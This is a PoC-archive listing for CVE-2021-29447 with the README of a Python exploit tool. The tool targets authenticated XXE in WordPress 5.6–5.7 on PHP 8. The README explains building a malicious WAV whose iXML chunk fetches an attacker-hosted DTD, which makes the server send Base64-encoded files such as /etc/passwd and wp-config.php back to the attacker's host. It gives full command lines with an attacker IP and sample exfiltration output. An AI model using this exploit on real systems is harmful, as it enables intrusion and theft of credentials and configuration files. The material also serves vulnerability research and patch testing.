Associated Vulnerability
Title:WordPress Authenticated XXE attack when installation is running PHP 8 (CVE-2021-29447)Description:Wordpress is an open source CMS. A user with the ability to upload files (like an Author) can exploit an XML parsing issue in the Media Library leading to XXE attacks. This requires WordPress installation to be using PHP 8. Access to internal files is possible in a successful XXE attack. This has been patched in WordPress version 5.7.1, along with the older affected versions via a minor release. We strongly recommend you keep auto-updates enabled.
Description
POC to exploit WordPress 5.6-5.7 (PHP 8+) Authenticated XXE Injection.
Readme
# CVE-2021-29447 Authenticated XXE Exploit for WordPress 🎯
A Python PoC to exploit the authenticated XXE vulnerability (CVE-2021-29447) in WordPress versions 5.6–5.7 via **WAV metadata**. It abuses the iXML chunk in WAV files to trigger an **Out-of-Band (OOB) exfiltration** of sensitive data—like `/etc/passwd`, `wp-config.php`, and more—straight into your `dump/` directory.
---
## How It Works 🔍
This script leverages an **XML External Entity (XXE)** flaw in how WordPress parses WAV metadata:
1. **WAV Creation**: Generates a malicious WAV file embedding an iXML chunk that references a remote DTD on your machine.
2. **DTD Hosting**: Spins up an HTTP server (or uses your own) to serve the crafted DTD, which instructs WordPress to read & Base64-encode a target file (e.g., `/etc/passwd`).
3. **File Upload**: Authenticates to WordPress, retrieves the media-upload nonce, and uploads the WAV via the Media Library.
4. **OOB Exfiltration**: WordPress parses the WAV, fetches the DTD, then performs a callback to your server containing the Base64 data. The script decodes it and writes it to `dump/`.
---
## Key Features ⚡
- **Interactive Mode** (`-i`): Prompt for file paths until `CTRL+C`—great for ad-hoc exploration.
- **Wordlist Mode** (`-w <file>`): Batch process dozens of file paths from a list.
- **Skip HTTP Server** (`--no-http`): Use your own webserver instead of the built‑in one.
- **Debug Mode** (`--debug`): See detailed HTTP & internal debug logs.
- **Clean, Colored Logs**: Prefixed labels—`[CONFIG]`, `[UPLOAD]`, `[DUMP]`, `[WARN]`, `[ERROR]`—for quick status checks.
- **Configurable Timeout**: Wait up to **6 seconds** for each exfil before continuing.
---
## Installation 🛠️
1. **Clone** the repository:
```bash
git clone https://github.com/Tea-On/CVE-2021-29447-Authenticated-XXE-WordPress-5.6-5.7.git
cd CVE-2021-29447-Authenticated-XXE-WordPress-5.6-5.7
```
2. **Install** the Python dependency:
```bash
pip3 install requests
```
---
## 🧾 Argument Reference
| Argument | Required | Description |
|---------------------|----------|----------------------------------------------------------------|
| `-H, --host` | ✅ | Local host/IP for serving DTD and receiving callbacks |
| `-p, --port` | ✅ | Local port for HTTP server |
| `-u, --user` | ✅ | WordPress username with upload permissions |
| `-P, --pass` | ✅ | WordPress password |
| `-d, --domain` | ✅ | Target WordPress URL (include `http://`) |
| `-w, --wordlist` | ❌ | File containing newline-separated paths to fetch |
| `-i, --interactive` | ❌ | Prompt for file paths interactively |
| `--no-http` | ❌ | Skip starting the built-in HTTP server |
| `--debug` | ❌ | Enable debug logs (verbose HTTP & internal details) |
---
## Example Usage 💥
#### Interactive Mode
```bash
python3 exploit_CVE-2021-29447.py \
-H 10.10.14.8 -p 8080 \
-u admin -P p@ssw0rd \
-d http://vulnerable.local -i
```
```
[CONFIG] Interactive mode (CTRL+C to exit)
File> /etc/passwd
[CONFIG] DTD written: dtd/L2V0Yy9wYXNzd2Q=.dtd
[CONFIG] WAV built
[INFO] Nonce: d87f00a552
[DUMP] Dumped: dump/passwd
[UPLOAD] Upload ok (200)
[UPLOAD] URL: http://vulnerable.local/wp-content/uploads/payload.wav
File>
```
#### Wordlist Mode
```bash
python3 exploit_CVE-2021-29447.py \
-H 10.10.14.8 -p 8080 \
-u admin -P p@ssw0rd \
-d http://vulnerable.local -w wordlist.txt
```
```
[CONFIG] Loaded 4 paths from "wordlist.txt"
[CONFIG] Using HTTP server at 10.10.14.8:8080
[CONFIG] Starting batch exfiltration...
[DUMP] [/etc/passwd] → dump/passwd
[WARN] No exfil for /etc/hostname within 6s, continuing
[UPLOAD] Upload ok (200)
[ERROR] Upload fail (502) on "/nonexistent"
```
#### No-Server & Debug
```bash
python3 exploit_CVE-2021-29447.py \
-H 10.10.14.8 -p 8080 \
-u admin -P p@ssw0rd \
-d http://vulnerable.local --no-http --debug -w wordlist.txt
```
> Use your own HTTP server to host `dtd/` and capture callbacks. Debug logs appear as `[DEBUG]`.
---
## Output Directories 📂
- `dtd/` – Generated DTD files served to the target.
- `dump/` – Decoded file contents, named after the original path.
---
## Tips & Tricks 💡
- **Adjust Timeout**: Change `EXFIL_TIMEOUT` variable (default 6s) for slow networks.
- **Use Debug**: Enable `--debug` to diagnose issues with auth, upload, or callbacks.
---
## Responsible Disclosure & License 🔐
**Only use this tool on systems you own or have explicit permission to test.**
Licensed under the [MIT License](LICENSE). Contributions welcome—let’s keep hacking **ethical** and **fun**! ✨
File Snapshot
[4.0K] /data/pocs/ac44a63d4b1ec8f0e0b860900b8ba53939d501a4
├── [ 10K] exploit_CVE-2021-29447.py
├── [1.0K] LICENSE
└── [4.9K] README.md
0 directories, 3 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →